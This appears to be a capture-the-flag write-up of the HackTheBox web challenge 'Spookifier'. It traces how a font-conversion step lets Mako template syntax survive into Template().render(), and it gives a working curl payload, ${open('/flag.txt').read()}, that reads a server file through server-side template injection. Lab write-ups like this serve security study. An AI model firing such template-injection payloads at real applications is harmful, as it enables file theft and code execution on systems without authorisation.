Challenge / Web

Spookifier

By Jennofrie Daguil · Cybersecurity and Red Team Operator

Flask web app that converts text into "spooky" fonts. Source code provided. The input flow is: 1. GET /?text=INPUT → routes.py 2. spookify(text) → change_font() converts to 4 font

Very EasyPublished 2025-10-21Sanitized local writeup

Scenario

Spookifier attack path

Flask web app that converts text into "spooky" fonts. Source code provided. The input flow is: 1. GET /?text=INPUT → routes.py 2. spookify(text) → change_font() converts to 4 font

Objective

Challenge walkthrough focused on Web evidence, validation, and reusable operator lessons.

Walkthrough flow

Source and route audit

Trust boundary flaw

Exploit request chain

Admin or proof proof

Source coverage

Moderate source coverage

Status: partial. This article is generated from 4 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

68% coverage

Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

Web/Spookifier/writeup.md
htb-challenge/Web/Spookifier/notes.md
htb-challenge/Web/Spookifier/memory-summary.md
htb-challenge/Web/Spookifier/hypothesis-board.md

Technical Walkthrough

Spookifier - Writeup

Challenge Info

Name: Spookifier
Category: Web
Difficulty: Very Easy
Flag: <flag stored in loot/flag.txt>

Approach

Triage

Flask web app that converts text into "spooky" fonts. Source code provided.

Analysis

The input flow is:

GET /?text=INPUT → routes.py
spookify(text) → change_font() converts to 4 font variants
generate_render() uses .format() to inject converted text into an HTML string
Template(result).render() renders that string as a Mako template

The critical insight: font4 maps all special characters to themselves, including $, {, }, (, ), ', /, . — meaning Mako expression syntax ${...} passes through untouched.

Solve

bash

curl -s "http://TARGET:PORT/?text=%24%7Bopen(%27%2Fflag.txt%27).read()%7D" | grep -oP 'HTB\{[^}]+\}'

URL-decoded payload: ${open('/flag.txt').read()}

Key Insight

Mako SSTI via font substitution that preserves special characters. The font4 dictionary acts as an identity mapping for all ASCII printable characters, allowing template expressions to survive the "conversion" and execute as Python code during Template.render().

Time: ~2 minutes

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

Challenge: Spookifier
Category: Web
Difficulty: Very Easy
Target: http://<TARGET>:32662/
Started: 2026-05-06

Evidence Ledger

Timestamp	Action	Finding	Next
00:00	Extract zip, read source	Flask + Mako templates, user input via `?text=` param	Trace input flow
00:01	Read util.py	`font4` preserves all special chars; `Template(result).render()` = Mako SSTI	Build payload
00:02	`curl /?text=${open('/flag.txt').read()}`	Flag returned in response	Done

Vulnerability

Type: Server-Side Template Injection (SSTI) — Mako
Sink: util.py:generate_render() → Template(result).render()
Why it works: font4 maps all special characters ($, {, }, (, ), ', /, .) to themselves, preserving Mako expressions intact in the 4th table row

Memory Summary

Metadata

Platform: HackTheBox Challenges
Category:
Challenge:
Difficulty:
Source workspace:

Validated Solve Chain

Concepts only. Do not include raw flags, reusable credentials, tokens, cookies, private keys, or live secrets.

Reusable Lessons

Dead Ends

Tool Quirks

Evidence Paths

Ingestion Decision

Proposed for LightRAG: yes/no
Requires user approval before ingestion: yes

Hypothesis Board

Rank	Path	Evidence	Missing Proof	Cheapest Validation	Confidence	Status

Closed Branches

Branch	Evidence Tested	Failure Output	Reason Closed	Revisit Condition

Technical analogy

How to remember this solve

Think of the web app like a building with signs on every door. The solve usually comes from reading the map carefully, finding the door the app forgot to hide, then sending the exact request that proves you understand the route.

For Spookifier, keep the mental model simple: identify the trusted assumption, prove it with the smallest safe test, then automate or repeat only the part that directly leads to the flag.